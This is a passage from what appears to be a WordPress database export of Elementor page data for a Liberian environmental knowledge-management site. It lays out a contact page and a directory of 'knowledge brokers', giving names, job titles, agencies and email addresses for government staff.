href=\\\"mailto:jameskollie@yahoo.com\\\">jameskollie@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"308cd55\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Eric Pervist <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:gendermedia1@gmail.com\\\">gendermedia1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcdddb1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"98f890d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c45b21c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f07c86\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"1205269\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5891ccb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/domah.png\",\"id\":3659}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ace9d4f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"765a1b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6893e76\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"237d9e7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d02417\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>N. Mamatu G. King <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:kingmamatu@gmail.com\\\">kingmamatu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9d523fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d8aba5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J. Josiah N. Domah <\\/strong><br \\/>Administrative Assistant, Office of the Minister<br \\/>MGCSP<br \\/><a href=\\\"mailto:josiahdomah@@gmail.com\\\">josiahdomah@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"be454e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b64ac2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Emmanuel G. Ballah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:emmanuelgballah_@gmail.com\\\">emmanuelgballah_@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(38586,3800,'_elementor_css','a:6:{s:4:\"time\";i:1770854588;s:5:\"fonts\";a:2:{i:0;s:5:\"Rubik\";i:1;s:6:\"Roboto\";}s:5:\"icons\";a:2:{i:0;s:0:\"\";i:2;s:8:\"fa-solid\";}s:20:\"dynamic_elements_ids\";a:4:{i:0;s:7:\"7fbf46e\";i:1;s:7:\"7fbf46e\";i:2;s:7:\"7fbf46e\";i:3;s:7:\"7fbf46e\";}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(34864,5094,'_elementor_pro_version','3.7.1'),(34865,5095,'_elementor_edit_mode','builder'),(34866,5095,'_elementor_template_type','wp-page'),(34867,5095,'_elementor_version','3.6.6'),(34868,5095,'_wp_page_template','default'),(34869,5095,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"96ae29e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/jwiagbe.png\",\"id\":3633}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:jduolupeh@gmail.com\\\">jduolupeh@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d8ecb8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2022\\/09\\/Halala.jpg\",\"id\":5086,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9ff3a4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/reeves.png\",\"id\":3635}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1c050c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/willabo.png\",\"id\":3636}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ddcc6df\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/kullie.png\",\"id\":3637}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a688b4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2022\\/09\\/ernest.jpg\",\"id\":5087,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":n